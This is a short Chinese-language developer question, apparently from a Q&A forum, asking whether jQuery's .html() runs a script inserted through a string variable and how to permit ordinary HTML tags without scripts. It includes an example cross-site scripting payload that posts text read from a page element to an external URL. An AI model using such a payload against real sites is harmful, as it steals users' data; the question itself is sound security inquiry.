jQuery.html() 危险吗?
$("#id").html("<span>"+ variable + "</span>");
与上面的示例一样,如果变量将具有以下值:
"<script> $.post("external_url.php", {sesitivedata= $("#someElement").text()}, function() {} ) </script>"
脚本会被执行吗?如果是这样,有什么方法可以让变量包含普通的 html 标签而不是脚本?
编辑:将脚本标签添加到字符串